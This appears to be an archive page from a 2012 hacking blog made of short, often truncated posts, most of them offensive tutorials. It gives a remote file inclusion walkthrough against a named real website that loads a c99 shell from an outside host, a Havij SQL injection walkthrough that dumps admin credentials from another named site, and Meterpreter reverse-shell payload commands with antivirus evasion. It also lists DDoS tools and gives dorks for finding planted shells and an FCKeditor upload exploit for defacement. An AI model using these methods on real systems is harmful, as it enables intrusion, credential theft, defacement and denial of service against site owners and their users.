Tuesday 28 February 2012

Android Forensics Study of Password and Pattern Lock Protection

If you want to see all detail, please go to the Source.

What is Password Lock?

So, while the Pattern Lock is a number, Password Lock can contain
characters, numbers, and special marks. Unlike patterns passwords can be
a real problem for the attacker as the number of variants grows
tremendously. Of course, this is true if you want to brute force
Password lock just like the Pattern. Well,

Sunday 26 February 2012

DDoS Tool List From Anonymous


DDOS TOOLS LIST!

 

DDoSim (Linux) - Download => http://tinyurl.com/4xe3vjk

Loris - Download => http://ha.ckers.org/slowloris/

Apachekiller - Download =>
http://pastebin.com/9y9Atijn save as "whatever.pl" <-- More
Infohttp://thehackernews.com/2011/08/killapache-ddos-tool-half-of-internet.html

perl for windows => http://www.activestate.com/activeperl/downloads

pyloris => http://

Wednesday 22 February 2012

Keylogging with Metasploit & Javascript

If you want the detail, please go to the Source.

Step 1: Module setup:


msf > use auxiliary/server/capture/http_javascript_keylogger
msf  auxiliary(http_javascript_keylogger) > set demo true
demo => true
msf  auxiliary(http_javascript_keylogger) > show options


Module options (auxiliary/server/capture/http_javascript_keylogger):


   Name        Current Setting  Required  Description
   ----

Tuesday 21 February 2012

IPTABLES Shell Script For Block NMAP

#!/bin/bash
# To run this file, first give the permission +x and execute this program
# --# chmod +x blocknmap.sh
# --# ./blocknmap.sh

echo "1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1"
echo "3 3"
echo "3 ________ .__ ________ 3"
echo "7 \______ \

Monday 20 February 2012

Post Exploitation To Manage Firewall And Antivirus

Firewall
1. Show Firewall Operation Mode
> netsh firewall show opmode

C:\Documents and Settings\Administrator>netsh firewall show opmodeDomain profile configuration:-------------------------------------------------------------------Operational mode                  = EnableException mode                    = EnableStandard profile configuration (current):----------------------------------------

SQLMap plugin for Burpsuite

If you want the detail and who develop this plugin, please go to the Source.

1.  Firstly, Download the plugin
https://gason.googlecode.com/files/burpplugins.jar

2. Run the burpsuite with plugin
$ java -classpath burpplugins.jar:”BurpSuite_v1.4.01.jar” burp.StartBurp

3. Click right mouse button over the url you want to test with sqlmap and choose "Send to  sqlmap"


 


4. Configure the sqlmap

Friday 17 February 2012

Using Metasm To Avoid Antivirus Detection (Ghost Writing ASM)

If you want all the detail, please go to the Source.

1. Create malicious file(backdoor)
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 R > raw_binary
or
$ ./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=443 -f raw > raw_binary

2. Copy metasm.rb (ruby library for disassemble file that normally ship with Metasploit ) to metasm folder of

Download Collection of Best SQLi Tools.


Following are the collection of some some of the best SQLi (Structured Query Language Injection) used for hacking websites and there data base. Download them try them and enjoy them.

1.Havij 1.7 -

2.SQLi Helper 2.7 -

3.SQLi Injecter V2.0 -

4.m4x MSSQL Injection

5.m4x MySQL Injection

6.SQL TooL v2.3

7.Simple SQLi Dumper v0.1

8.ADSQL

9.CASI 4.0

10.HDSI

11.pangolin v1.3.1.650

12.NBSI
# Learn How To Hack a Website with SQLi Here  

Recommended Security Application For iOS

All the app that I recommended, you must jailbreak your device. 

Repository:
Default cydia repo
http://cydia.myrepospace.com/chattaboxa
http://cydia.myrepospace.com/boo
http://cydia.theworm.tw/


OpenSSH – Allows to connect to the iPhone remotely over SSH
Adv-cmds : Comes with a set of process commands like ps, kill, finger…
Sqlite3 : Sqlite database client
GNU Debugger: For run time analysis &

Thursday 16 February 2012

Bypassing Web Application Firewalls with SQLMap Tamper Scripts



The focus of the tamper scripts is to modify the request in a way that
will evade the detection of the WAF (Web Application Firewall) rules. In
some cases, you might need to combine a few tamper scripts together in
order to fool the WAF. For a complete list of the tamper scripts, you
can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/



The first scripts I’ll demonstrate are

Monday 13 February 2012

Add jQuery Pop-Up Facebook Like Box.

By adding this widget on your Blogspot blog, whenever a new visitor arrives on  your blog a jQuery pop up box will appear containing the Facebook Like Box.
(For Blogspot and Wordpress Both.)
I am discussing here steps for blogger but if you know how to deal simple HTML code then you can easily add it to your wordpress blog too.
  1. Go To Blogger > Design
  2. Click choose a gadget
  3. Select HTML/javascript widget
  4. Paste the following code inside it


<style>

/*
   ColorBox Core Style:
   The following CSS is consistent between example themes and should not be altered.
*/
#colorbox, #cboxOverlay, #cboxWrapper{position:absolute; top:0; left:0; z-index:9999; overflow:hidden;}
#cboxOverlay{position:fixed; width:100%; height:100%;}
#cboxMiddleLeft, #cboxBottomLeft{clear:left;}
#cboxContent{position:relative;}
#cboxLoadedContent{overflow:auto;}
#cboxTitle{margin:0;}
#cboxLoadingOverlay, #cboxLoadingGraphic{position:absolute; top:0; left:0; width:100%;}
#cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{cursor:pointer;}
.cboxPhoto{float:left; margin:auto; border:0; display:block;}
.cboxIframe{width:100%; height:100%; display:block; border:0;}
/*

   User Style:
   Change the following styles to modify the appearance of ColorBox.  They are
   ordered & tabbed in a way that represents the nesting of the generated HTML.
*/
#cboxOverlay{background:#000;opacity:0.5 !important;}
#colorbox{
        box-shadow:0 0 15px rgba(0,0,0,0.4);
       -moz-box-shadow:0 0 15px rgba(0,0,0,0.4);
        -webkit-box-shadow:0 0 15px rgba(0,0,0,0.4);
       }
  
#cboxTopLeft{width:14px; height:14px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQMr_z8O7zk8k4IqsIMG6BlayPyl8WV9oQLXv-_BttqP5MgRATPn-3c8V_yT7BMw9i1T4JshMo5dDTPz7vrgJe6B1gHNuD4_QiUzwa3cg_AYVgtlCw6H9QMIB6u7wpQ3BJu3JsmSHeUY/s1600/controls.png) no-repeat 0 0;}
#cboxTopCenter{height:14px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbUk7iUt7e_2-LujB0D2wdFeJEpapwf0uavXSE9YeTe_xy1DoL_6a_u8uHgE846c4aHXMafCPvoUmsCttJPryNNrLhfp-h7ujUlC04tKOKdjVHCGsRRtW_ulfjifn7X4AyRgl5St9QTCQ/s400/border.png) repeat-x top left;}
     #cboxTopRight{width:14px; height:14px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQMr_z8O7zk8k4IqsIMG6BlayPyl8WV9oQLXv-_BttqP5MgRATPn-3c8V_yT7BMw9i1T4JshMo5dDTPz7vrgJe6B1gHNuD4_QiUzwa3cg_AYVgtlCw6H9QMIB6u7wpQ3BJu3JsmSHeUY/s1600/controls.png) no-repeat -36px 0;}
     #cboxBottomLeft{width:14px; height:43px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQMr_z8O7zk8k4IqsIMG6BlayPyl8WV9oQLXv-_BttqP5MgRATPn-3c8V_yT7BMw9i1T4JshMo5dDTPz7vrgJe6B1gHNuD4_QiUzwa3cg_AYVgtlCw6H9QMIB6u7wpQ3BJu3JsmSHeUY/s1600/controls.png) no-repeat 0 -32px;}
     #cboxBottomCenter{height:43px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbUk7iUt7e_2-LujB0D2wdFeJEpapwf0uavXSE9YeTe_xy1DoL_6a_u8uHgE846c4aHXMafCPvoUmsCttJPryNNrLhfp-h7ujUlC04tKOKdjVHCGsRRtW_ulfjifn7X4AyRgl5St9QTCQ/s400/border.png) repeat-x bottom left;}
     #cboxBottomRight{width:14px; height:43px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQMr_z8O7zk8k4IqsIMG6BlayPyl8WV9oQLXv-_BttqP5MgRATPn-3c8V_yT7BMw9i1T4JshMo5dDTPz7vrgJe6B1gHNuD4_QiUzwa3cg_AYVgtlCw6H9QMIB6u7wpQ3BJu3JsmSHeUY/s1600/controls.png) no-repeat -36px -32px;}
     #cboxMiddleLeft{width:14px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQMr_z8O7zk8k4IqsIMG6BlayPyl8WV9oQLXv-_BttqP5MgRATPn-3c8V_yT7BMw9i1T4JshMo5dDTPz7vrgJe6B1gHNuD4_QiUzwa3cg_AYVgtlCw6H9QMIB6u7wpQ3BJu3JsmSHeUY/s1600/controls.png) repeat-y -175px 0;}
     #cboxMiddleRight{width:14px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQMr_z8O7zk8k4IqsIMG6BlayPyl8WV9oQLXv-_BttqP5MgRATPn-3c8V_yT7BMw9i1T4JshMo5dDTPz7vrgJe6B1gHNuD4_QiUzwa3cg_AYVgtlCw6H9QMIB6u7wpQ3BJu3JsmSHeUY/s1600/controls.png) repeat-y -211px 0;}
     #cboxContent{background:#fff; overflow:visible;}
         #cboxLoadedContent{margin-bottom:5px;}
         #cboxLoadingOverlay{background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSfN3CVFmfd-jax6AtV4b8pwKDc_bLwdCzT7m4hIrLP8mxJa_wFTVlLyX5icVvPLIAbw9izXCsVLtxMc0MixVBcGep21yVpEgI-Wnlnz9ycORZU9wSLZy7mXmnKuA3ig9JwYM7RdHHYUY/s400/loadingbackground.png) no-repeat center center;}
         #cboxLoadingGraphic{https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrsOcaN_FaVYKhtYj_oXT9ud3c_k3ybirX20sTF5sozUM6huuidjEyOpJArmwngeWzSHEqQGTVQNnqUTiEt3Iunj-pgJiVwcX5fRn0r9hX3EBASJQQ8U4lmQs13OSVohnPBNFKNaW5gFQ/s400/loading.gif) no-repeat center center;}
         #cboxTitle{position:absolute; bottom:-25px; left:0; text-align:center; width:100%; font-weight:bold; color:#7C7C7C;}
         #cboxCurrent{position:absolute; bottom:-25px; left:58px; font-weight:bold; color:#7C7C7C;}
         #cboxPrevious, #cboxNext, #cboxClose, #cboxSlideshow{position:absolute; bottom:-29px; background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYQMr_z8O7zk8k4IqsIMG6BlayPyl8WV9oQLXv-_BttqP5MgRATPn-3c8V_yT7BMw9i1T4JshMo5dDTPz7vrgJe6B1gHNuD4_QiUzwa3cg_AYVgtlCw6H9QMIB6u7wpQ3BJu3JsmSHeUY/s1600/controls.png) no-repeat 0px 0px; width:23px; height:23px; text-indent:-9999px;}
         #cboxPrevious{left:0px; background-position: -51px -25px;}
         #cboxPrevious.hover{background-position:-51px 0px;}
         #cboxNext{left:27px; background-position:-75px -25px;}
         #cboxNext.hover{background-position:-75px 0px;}
         #cboxClose{right:0; background-position:-100px -25px;}
         #cboxClose.hover{background-position:-100px 0px;}
         .cboxSlideshow_on #cboxSlideshow{background-position:-125px 0px; right:27px;}
         .cboxSlideshow_on #cboxSlideshow.hover{background-position:-150px 0px;}
         .cboxSlideshow_off #cboxSlideshow{background-position:-150px -25px; right:27px;}
         .cboxSlideshow_off #cboxSlideshow.hover{background-position:-125px 0px;} 

/*-----------------------------------------------------------------------------------*/
/*   Facebook Likebox popup For Blogger
/*-----------------------------------------------------------------------------------*/
#subscribe {
    font: 12px/1.2 Arial,Helvetica,san-serif; color:#666;
}
#subscribe a,
#subscribe a:hover,
#subscribe a:visited {
    text-decoration:none;
}
.box-title {
   color: #F66303;
   font-size: 20px !important;
   font-weight: bold;
   margin: 10px 0;
border:1px solid #ddd;
-moz-border-radius:6px;
-webkit-border-radius:6px;
border-radius:6px;
box-shadow: 5px 5px 5px #CCCCCC;
padding:10px;
line-height:25px; font-family:arial !important;
}
.box-tagline {
   color: #999;
   margin: 0;
   text-align: center;
}
#subs-container {
    padding: 35px 0 30px 0;
    position: relative;
}
a:link, a:visited {
border:none;
}
.demo {
display:none;
}
</style>

<script src='https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js'></script> 
<script src="http://mybloggertricks.googlecode.com/files/jquery.colorbox-min.js"></script>
<script type="text/javascript">
jQuery(document).ready(function(){
   if (document.cookie.indexOf('visited=true') == -1) {
       var fifteenDays = 1000*60*60*24*30;
       var expires = new Date((new Date()).valueOf() + fifteenDays);
       document.cookie = "visited=true;expires=" + expires.toUTCString();
   $.colorbox({width:"400px", inline:true, href:"#subscribe"});
       }
});
</script>
    <!-- This contains the hidden content for inline calls -->

        <div style='display:none'>
   <div id='subscribe' style='padding:10px; background:#fff;'>
        <h3 class="box-title">Receive all updates via Facebook. Just Click the Like Button Below<center><p style="line-height:3px;" >▼</p></center></h3>
      <center>
<iframe src="//www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fhackingsecrects&amp;width=300&amp;colorscheme=light&amp;show_faces=true&amp;border_color=%23ffffff&amp;stream=false&amp;header=false&amp;height=258" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:258px;" allowtransparency="true"></iframe>
</center>
<p style=" float:right;  margin-right:35px;  font-size:9px;" >Powered By <a style=" font-size:9px; color:#3B78CD; text-decoration:none;" href="http://www.almashackingtutorials.blogspot.in">Blogger Widgets</a></p>
</div>
</div>


Note:- IN THE ABOVE CODES YOU HAVE ADD YOUR OWN FACEBOOK PAGE USERNAME. THE     HIGHLITED TEXT IN THE CODES (HACKINGSECRECTS) <<-- THIS IS THE USERNAME OF MY FACEBOOK PAGE. REMOVE MY USERNAME AND ADD YOURS BEFOR ADDING THE WIDGET ON YOU BLOG.  \M/

Barrelroll - Make Proxy Server to DDoS Clients

This program makes proxy servers into DDoS clients. Use only for educational and research purposes. 



->Requires<-



-> pycurl

-> python 2.3



                                     ->Usage<-



$ ./barrelroll.py [ip] [host] [forks]



                                    ->Example<-



$ ./barrelroll.py 8.8.8.8 google.com 30 < full_list/_full_list.txt

$ ./barrelroll.py 8.8.4.4

Sunday 12 February 2012

Deface pages for your love- II




Following are some new deface pages created  to make your  love more happy this Valentines day.
1. Heart with Roses. View Here


2.  Amazing photo Gallary. View Here


3. Cute Teddy. View Here


How to edit the text or graphics present in the page
Visit the deface page, save the page on your computer edit the text or anything you want and save it.  Upload it on any site as your deface or upload it on www.pastehtml.com





Thanks:- Minhal Mendhi

SQL Injection Full Tutorial through Havij




Firstly i am going to introduce the term havij :)
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.
It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system.
The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.


The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users.

Download havij 1.10

First Find a sqli infected site .Now here i found a vulernable site

http://www.hypetrading.com/productinfo.php?id=285

Now Let's start

Open havij and copy and paste infected link as shown in figure




Now click in the "Analyze"



Then It shows some messages there....Be alert on it and be show patience for sometime to find it's vulernable and type of injection and if db server is mysql and it will find database name.Then after get it's database is name like xxxx_xxxx



Then Move to another operation to find tables by clicking "tables" as figure shown.Now click "Get tables" Then wait some time if needed




After founded the tables ,you can see there will be "users" Put mark on it and click in the " get columns " tab as shown in figure



In that Just put mark username and password and click "Get data"


Bingo Got now id and pass that may be admin...
The pass will get as md5 you can crack it also using this tool as shown in figure...





Having problem?? Mention them in your comments. We will help you will definetly solve them.

Remote File Inclusion (RFI) Website Hacking Tutorial.


 Hello friends here i am posting one another method of website hacking called RFI (Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. 
Lets Start 
1st Step : Find a Vunerable websites using Google Dork


Click Here to get more RFI dork


“inurl:index.php?page=” its a Dork of RFI hacking 

It will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command
www.targetsite.com/index.php?page=www.google.com


see example of this website http://www.cbspk.com
http://www.cbspk.com/v2/index.php?page=http://www.google.com


If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack.


Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:
Or you can download our Top 100 Best Shells Here


http://www.sh3ll.org/c99.zip


Now we need to upload the shells to a webhosting site such as ripway.com, viralhosts.com,110mb.com or another free hosts etc.


Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is http://www.sh3ll.org/c99.txt?


Now here is how a hacker would execute the following command to gain access


http://www.cbspk.com/v2/index.php?page=http://www.sh3ll.org/c99.txt?
Don't Forget To add “?” after .txt at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it.


# For more website hacking tutorials click Here

How to Change IP address


How to change your IP address in less than a minute? The following trick gives you a step-by-step procedure to change your IP address.


1. Click on “Start” in the bottom left hand corner of screen.
2. Click on “Run”.
3. Type in “command” and hit ok.You should now be at an MSDOS prompt screen.
4. Type “ipconfig /release” just like that, and hit “enter”.
5. Type “exit” and leave the prompt.
6. Right-click on “Network Places” or “My Network Places” on your desktop.
7. Click on “properties”.
You should now be on a screen with something titled “Local Area Connection”, or something close to that.

8. Right click on “Local Area Connection” and click “properties”.
9. Double-click on the “Internet Protocol (TCP/IP)” from the list under the “General” tab.
10. Click on “Use the following IP address” under the “General” tab.
11. Create an IP address (It doesn’t matter what it is. I just type 1 and 2 until i fill the area up).
12. Press “Tab” and it should automatically fill in the “Subnet Mask” section with default numbers.
13. Hit the “Ok” button here.
14. Hit the “Ok” button again. You should now be back to the “Local Area Connection” screen.
15. Right-click back on “Local Area Connection” and go to properties again.
16. Go back to the “TCP/IP” settings.
17. This time, select “Obtain an IP address automatically”.
18. Hit “Ok”.
19. Hit “Ok” again.
20.  Now You have a new IP address.


Some ISPs do not support this type of procedure and hence there are chances of getting back the same old IP address even after trying this hack. In this case you need to switch off the modem and then switch it on to get the new IP address.
NOTE: All these tricks works only if you have a dynamic IP address. But if you have a static IP address you have no option to change your IP.


Thanks:- Ronny Roy

Saturday 11 February 2012

Adding More Pentesting Tools for BackTrack 5

If you want the detail and list of tools, please go to the source.

1. Download the script
- svn checkout http://bt5-fixit.googlecode.com/svn/trunk/ bt5-fixit
2. Go into folder and change mode of script
- cd bt5-fixit
- chmod +x bt5-fixit.sh
3. Run it and check what you got.
- ./bt5-fixit.sh


Source: http://www.theprojectxblog.net/improving-and-adding-more-pentesting-tools-for-backtrack-5/

If

Thursday 9 February 2012

Vulnerability in Novell website By Team

Vulnerability in Novell website. From: Team Date: Wed, 08 Feb 2012 23:10:21 -0200  Hello :-) I sent email stating the problem for the company,waited a few days and got no response, so I'm making the vulnerabilitypublic: Scan date: 2-2-201213:33:54===================================================================================================|Domain: http://

Tuesday 7 February 2012

Howto: Jailbreak iPhone iOS 5

Now
that iOS 5.0.1 is available for download, we knew it was only a matter
of days before a Jailbreak would be available for the new iOS. And we
didn’t have long to wait.
A tethered jailbreak version of RedSn0w 0.9.9b8. Is now available for
download. For those of you who wish to wait for an untethered
jailbreak, keep in mind that the jailbreak may not be available in the
near future.

Keep

Android Multiple Vulnerabilities By 80vul.com

Android Multiple Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt


Ph4nt0m Webzine 0x06 has been released[http://www.80vul.com/webzine_0x06/],
there three papers on the android application security about the development environment,browser security, inter-application communication.And published

Monday 6 February 2012

Installer Script For Metasploit on iOS5 by Khalil Ounis





#/bin/bash
# Author: Khalil Ounis
# Description: iDevice Metasploit Auto Installer Script Version 3
# Web Site: www.89geek.com

ROOT_UID=0
VARDIR=/private/var/
CURRDIR=`pwd`
E_NODIR=1
E_CANTRESOLVE=4
E_NOTROOT=67
E_CMDNOTFOUND=127

clear

[ "$UID" != "$ROOT_UID" ] && {
echo "This script must be run as root";
exit $E_NOTROOT;
}

echo "Metasploit Installer Script V3 - By Khalil Ounis"
echo "

Deface pages for your love

Following are my top favrouite deface pages to make you lovers feel special and happy


1. Deface Page 1 - View Here

2. Deface Page 2 - View Here

3. Deface Page 3 - View Here

How to edit the text or graphics present in the page
Visit the deface page, save the page on your computer edit the text or anything you want and save it.  Upload it on any site as your deface or upload it on www.pastehtml.com


Some Love Lines 
No-one can tear us apart 

I love you with all of my heart
More than the moon
More than the stars
Longing forever to be where you are
Coz I love you with all of my heart.
No-one can tear us apart
I feel sad and blue
"Only" dreaming of you
For your love is the joy of my heart.


Why can't I speak when I have so much to tell?
Why can't I write when I have so much in mind?
Why can't I sing when there's music in my heart?
Why can't I dance when there's rythm in the air?
Too many words left unspoken
Too many things left undone
Why can't it be and why can't I?
For all I know this pain deep inside
Took the gladness from my heart.
Is this the pain of missing you?
Is this the reason behind it all?
Hear the agony of my heart
Longing for you and for your touch
Feeling your lips, feeling your face
Missing your kisses and warm embrace.
When will the waiting ever be over?
For as long as were apart I can never be whole
Oh! My Dearest Love
I just want you to know
That my heart is aching because
"I'M MISSING YOU!"

For more love lines visit ..::Mission Moments::..



Saturday 4 February 2012

Open Source database of android malware


If you want to see full list of android malware, please go to the source.

This database is open
source and anybody can send comments in order to add new links to
analysis articles, to apply modifications on signatures or to add new
signatures (it's is done on our free time, of course our free time is
limited, so if you want to help, you are welcome !).

email: androguard (at) t0t0 (dot)

Download Gmail Hacking



This a Free E-book in which you will find untold Gmail tips,tricks and hacks which  is written by my friend Raj Chandal.


About The Author : This Book Was written by Raj Chandel, Raj Chandel started his career at a very young age of 18 since then he has performed the roles of experienced Ethical Hacker, Cyber Security Expert, Penetration Tester. He has also served IT industry by taking care of Network Security , System Security, SEM with a first hand experience of 3 years in Web Developement, Ethical Hacking and Internet marketing .


Download Here

Upload your Shell or Find already uploaded Shells.

 


Google Dork: "Index of /sh3llZ" 
                                    "/sh3llZ/uploadshell/uploadshell.php"
                     intitle:index of/sh3llZ


Use both Google search and bing search to find more result to upload your own shell or find already uploaded shells. After opening the search result you can upload your own shell or deface there, or even use already uploaded shell.







I Spent my 30 minutes to write this post please spend 30 seconds to say thanks and comments here.

FCKeditor: Remote file upload exploit.





Dork: intitle:"FCKeditor - Uploaders Tests"


Exploit:http://website.domain/fckeditor/editor/filemanager/connectors/uploadtest.html


By searching this dork you will get many websites, goto to the above mentioned URL and you will get the FCKeditor there. Change the file uploader to PHP then select your .txt deface and click on send it to the server. If the file is uploaded sucessfully you will get a alert saying "File Uploaded with no errors" .
See you deface here:



http://www.website.domain/userfiles/yourfilehere
http://www.website.domain/path/userfiles/yourfilehere


Note: Some websites even allow to upload .html and .jpg files also.